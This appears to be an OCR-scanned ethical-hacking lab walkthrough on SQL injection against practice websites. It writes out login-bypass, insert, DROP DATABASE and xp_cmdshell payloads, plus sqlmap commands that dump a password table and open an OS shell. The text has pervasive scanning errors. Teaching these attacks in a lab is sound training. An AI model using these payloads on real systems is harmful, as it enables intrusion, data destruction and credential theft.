Perform an SQL Injection Attack on an MSSQL Database

Note: In this lab, the machine hosting the website (d1e Windows Server 2019) is the victim machine; and the Windows 10 virtual machine will perform the attack.
1. Turn on the Windows 10 and Windows Server 2019 virtual machines.
2. In the Windows 10 virtual macl1ine, login with the credentials Admin and Pa$$w0rd.
3. Open any web browser (in this case, we are using Mozilla Firefox), type http://www.goodshopping.com/ in the address bar, and press Enter.
The GOOD SHOPPING home page loads. Assume dmt you are new to this site and have never registered with it; click LOGIN on the menu bar.
In the Username field, type the query blah' or 1=1 -- as your login name, and leave the password field empty. Click the Log in button.
You are now logged into the website with a fake login, even though your credentials are not valid. Now, you can browse all the site's pages as a
registered member. After browsing the site, click Logout from the top-right comer of the webpage
Note: Blind SQL injection is used when a web application is vulnerable to an SQL injection, but the results of the injection are not visible to the attacker. It is
identical to a normal SQL injection except that when an attacker attempts to exploit an application, rather than seeing a useful (¡.e., information-rich) error
message, a generic custom page is displayed. In blind SQL injection, an attacker poses a true or false question to the database to see if the application is vulnerable
to SQL injection.
7. Now, we shall create a user account using the SQL injection query. Before proceeding with this sub-task, we shall first examine the login database of the
GoodShopping website.
8. Switch to the Windows Server 2019 virtual machine and login with the  credentials Administrator and Pa$$w0rd.
Note: In this task, we are logging into the Windows Server 2019 virtual machine as a vtctrm.
9. Click the Type here to search icon in the lower section of Desktop and type microsoft. From the results, click Microsoft SQL Server Management Studio 18.
Microsoft SQL Server Management Studio opens, along with a Connect to Server pop-up. In the Connect to Server pop-up, leave the default
settings as they are and click the Connect button
In the left pane of the Microsoft SQL Server Management Studio window, under the Object Explorer section, expand the Databases node.
From the available options, expand rl1e GoodShopping node, and then the Tables node under it.
12. Under the Tables node, right-click the dbo.Login file and click Select Top 1000 Rows from the context menu to view the available credentials
You can observe that the database contains only one entry with the username and password as smith and smith123, respectively.
Switch back to the Windows 1O virtual machine and go to the browser where the GoodShopping website is open.
15. Click LOGIN on the menu bar and type the query blah';insert into login values ('john', 'apple123'); -- in the Username field (as your login name)
and leave the password field empty. Click the Log in button
If no error message is displayed, it means that you have successfully created your login using an SQL injection query.
17. After executing the query, to verify whether your login has been created successfully, click the LOGIN tab, enter john in the Username field and
apple123 in the Password field, and click Log in
You will log in successfully with the created login and be able to access all the features of the website.
19. After browsing the required pages, click Logout from the top-right corner of the webpage
Switch back to the victim machine (Windows Server 2019 virtual  machine).
21. In the Microsoft SQL Server Management Studio window, right-click dbo.Login, and click Select Top 1000 Rows from the context menu.
22. You will observe that a new user entry has been added to the website's login database file with the usemame and password as john and apple123,
respectively. Note down the available databases.
Switch back to the Windows 1O virtual machine and the browser where the GoodShopping website is open.
24. Click LOGIN on the menu bar and type the query blah';create database mydatabase; -- in the Username field (as your login name) and leave the
password field empty. Click d1e Log in button.
25. In the above query, mydatabase is the name of the database
If no error message (or any message) displays on the webpage, it means that
the site is vulnerable to SQL injection and a database with the name
mydatabase has been created on the data base server.
27. Switch back to the Windows Server 2019 virtual machine.
28. In the Microsoft SQL Server Management Studio window, un-expand the Databases node and click the Refresh icon.
29. Expand the Databases node. A new database has been created with the name mydatabase
Switch back to rl1e Windows 1 O virtual machine and ilie browser where ilie
GoodShopping website is open.
31. Click LOGIN on the menu bar and type the query blah'; DROP DATABASE mydatabase; -- in ilie Username field; leave the Password field empty
and click Log in.
Note: In the above query, you are deleting the database that you created in Step 24 (mydatabase). In the same way, you could also delete a table from
the victim website database by typing blah'; DROP TABLE table_name; -- in the Username field
Switch back to d1e Windows 1 O virtual machine and the browser where the
GoodShopping website is open.
36. Click LOGIN on the menu bar and type the query blah';exec master..xp_cmdshell 'ping www.certifiedhacker.com -l 65000 -t'; -- in
the Username field; leave the Password field empty and click Log in.
Note: In ilie above query, you are pinging the www.certifiedhacker.com website using an SQL injection query. -l is the sent buffer size and -t refers to
pinging the specific host.
The SQL injection query starts pinging the host, and the login page shows a Waiting for www.goodshopping.com ... message at the bottom of the window
To see whether the query has successfully executed, switch back to the victim machine (Windows Server 2019) .
39. Right-click the Start icon in the bottom-left corner of Desktop and from the options, click Task Manager. Click More details in the lower section of the
Task Manager window.
40. Navigate to the Details tab and type p. You can observe a process called PING.EXE running in the background.
This process is the result of the SQL injection query that you entered in the login field of the target website


SQLMAP

In parrot Click the Mozilla Firefox icon from the menu bar in the top-left corner of Desktop to launch the web browser.
4. Type http://www.moviescope.com/ and press Enter. A Login page loads; enter the Username and Password as sam and test, respectively.
Click the Login button.
Note: If a Would you like Firefox to save this login for moviescope.com? notification appears at the top of the browser window, click Don't Save
Once you are logged into the website, click the View Profile tab on the menu bar and, when the page has loaded, make a note of the URL in the address bar of the browser
Right-click anywhere on the webpage and click lnspect Element (Q) from the context menu
The Developer Tools frame appears in the lower section of the browser window. Click the Console tab, type document.cookie in the lower-left
corner of the browser, and press Enter
8.Select the cookie value, then right-click and copy it, as shown in the screenshot. Minimize the web browser.
N ote: The cookie value may differ in your lab environment
In the terminal window, type sudo su and press Enter to run the programs as a root user.
11. In the [sudo) password for attacker field, type toor as a password and press Enter. Note: The password that you type will not be visible.
12. Now, type cd and press Enter to jump to the root directory. 
In the Parrot Terminal window, type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value that you copied in Step 8>" --dbs and press
Enter.
Note: In this query, -u specifies the target URL (the one you noted down in Step 5), --cookie specifies the HTTP cookie header value, and --dbs enumerates DBMS databases.
14. The above query causes sqlmap to enforce various injection techniques on the name parameter of the URL in an attempt to extract the database
information of the MovieScope website
If the message Do you want to skip test payloads specific for other DBMSes? [Y/n] appears, type Y and press Enter.
16. If the message for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values?
[Y/n] appears, type Y and press Enter.
17. Similarly, if any other message appears, type Y and press Enter to continue.
sqlmap retrieves the databases present in the MSSQL server. lt also displays information about d1e web server OS, web application technology, and the
backend DBMS
sqlmap retrieves the databases present in d1e MSSQL server. lt also displays information about d1e web server OS, web application technology, and the
backend DBMS
Now, you need to choose a database and use sqlmap to retrieve the tables in the data base. In this lab, we are going to determine the tables assocíated with
the database moviescope.
20. Type sqlmap -u "http:llwww.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value which you have copied in Step 8>" -D moviescope --tables and press Enter.
Note: In this query, -D specifies the DBMS database to entunerate and --tables enumerates DBMS data base tables.
21. The above query causes sqlmap to sean d1e moviescope data base for tables located in the database.
sqlmap retrieves the table contents of the moviescope database and displays them
Now, type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value which you have copied in Step 8>" -D moviescope -T User_Login --dump 
and press Enter to dump all the User_Login table content
sqlmap retrieves the complete User_Login table data from the database moviescope, containing all users' usernames under the Uname column and
passwords under the password column.
25. You will see that under the password column, the passwords are shown in plain text form.
To verify if the login details are valid, you should try to log in with the extracted login details of any of the users. Todo so, switch back to the web
browser, dose the Developer Tools console, and dick Logout to start a new session on the site
The Login page appears; log in into the website using rl1e retrieved credentials john/ qwerty.
Note: If a Would you like Firefox to save this login for moviescope.com? notification appears at the top of the browser window, click Don't Save.
28. You will observe that you have successfully logged into yhe MovieScope website with john's account
Now, switch back to the Parrot Terminal window. Type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value which you have copied in Step 8>" --os-shell 
and press Enter. Note: In this query, --os-shell is the prompt for an interactive OS shell
If the message do you want sqlmap to try to optimize value(s) for DBMS delay responses appears, type Y and press Enter to continue
Once sqlmap acquíres the permission to optimize the machine, it will provide you with the OS shell. Type hostname and press Enter to find the machine
name where the site is running.
32. If the message do you want to retrieve the command standard output? appears, type Y and press Enter.
sqlmap will retrieve the hostname of the machine on which the target web application is running.
Type TASKLIST and press Enter to view a list of tasks that are currently running on tl1e target system.
Note: If the message do you want to retrieve the command standard output? appears, type Y and press Enter.
35. The above command retrieves the tasks and displays them under the command standard output section
Following the same process, you can use various other commands to obtain further detailed information about d1e target machine.
N ote: To view the available commands under the OS shell, type help and press Enter.

DSSS

In parrot In the terminal window, type git clone https://github.comlstamparm/DSSS and press Enter to clone the DSSS repository.
N ote: You can also access the tool repository from the CEH-Tools folder available in Windows 1O virtual machine, in case, the github link does not exist,
or you are unable to clone the tool repository. Follow the steps below in order to access CEH-Tools folder from the Parrot Security virtual machine:
• Open a windows explorer and press Ctrl+L. The Location field appears;
type smb://10.10.10.10 and press Enter to access Windows 10 shared folders
The security pop-up appears; enter the Windows 10 virtual machine credentials (Usemame: Admin and Password: Pa$$w0rd) and click Connect.
The Windows shares on 10.10.10.10 window appears; navigate to the location CEH-Tools/CEHv11 Module 15 SQL lnjection/GitHub Tools/ and copy the DSSS folder.
Paste the copied DSSS folder on the location /home/attacker/.
In the terminal window, type mv /home/attacker/DSSS /root/ .
8. After the cloning process is complete, type cd DSSS and press Enter to navigate to the downloaded DSSS folder.
9. Now, type ls and press Enter to view the folder content.
1 O. You will see the Python file dsss.py; we will use this program to detect SQL injection vulnerabilities on the target website
In the terminal window, type python3 dsss.py and press Enter to view a list of available options in d1e DSSS application
In the Mozilla Firefox window, type http://www.moviescope.com/ in the address bar and press Enter. A Login page loads; enter the Username
and Password as sam and test, respectively. Click the Login button.
N ote: If a Would you like Firefox to save this login for moviescope.com? notification appears at the top of the browser window, click Don't Save.
Once you are logged into the website, click the View Profile tab from the menu bar; and when the page has loaded, make a note of the URL in the
address bar of the browser.
15. Right-click anywhere on the webpage and click lnspect Element (Q) from the context menu, as shown in the screen
The Developer Tools frame appears in the lower section of the browser window. Click the Console tab, type document.cookie in the lower-left
corner of the browser, and press Enter
Select the cookie value, then right-click and copy it. Minimize the web browser.Note: The cookie value might differ in your lab environment.
Switch to a tenninal window and type python3 dsss.py -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value which you have copied in Step 17>" and
press Enter.
Note: In dus command, -u specifies the target URL and --cookie specifies the HITP cookie header value
The above command causes DSSS to sean ilie target website for SQL injection vulnerabilities.
20. The result appears, showing that the target website (www.moviescope.com) is vulnerable to blind SQL injection attacks. The vulnerable link is also displayed
Highlight the vulnerable website link, right-click it, and, from the options, click Copy
Switch to Mozilla Firefox; in a new tab, paste the copied link in the address bar and press Enter.
23. You will observe that information regarding available user accounts appears under the View Profile tab
Scroll down to view the user accotmt information for all users


OWASP ZAP

In windows The OWASP ZAP main window appears; under the Quick Start tab, click the Automated Scan option.
The Automated Scan wízard appears, enter the target website in the URL to attaek field (in this case, http://www.moviescope.com) . Leave other
options set to default, and then click the Attack button
OWASP ZAP starts performing Active Scan on the target website
After the sean completes, Alerts tab appears.
8. You can observe the vulnerabilities found on the website under the Alerts tab.
Now, expand the SQL lnject ion vulnerability node under the Alerts tab
Click on the discovered SQL lnjection vulnerability and further click on the vulnerable URL
11. You can observe the infonnation such as Risk, Confidence, Parameter, Attack, etc., regarding the discovered SQL Injection vulnerability in the lower right-bottom
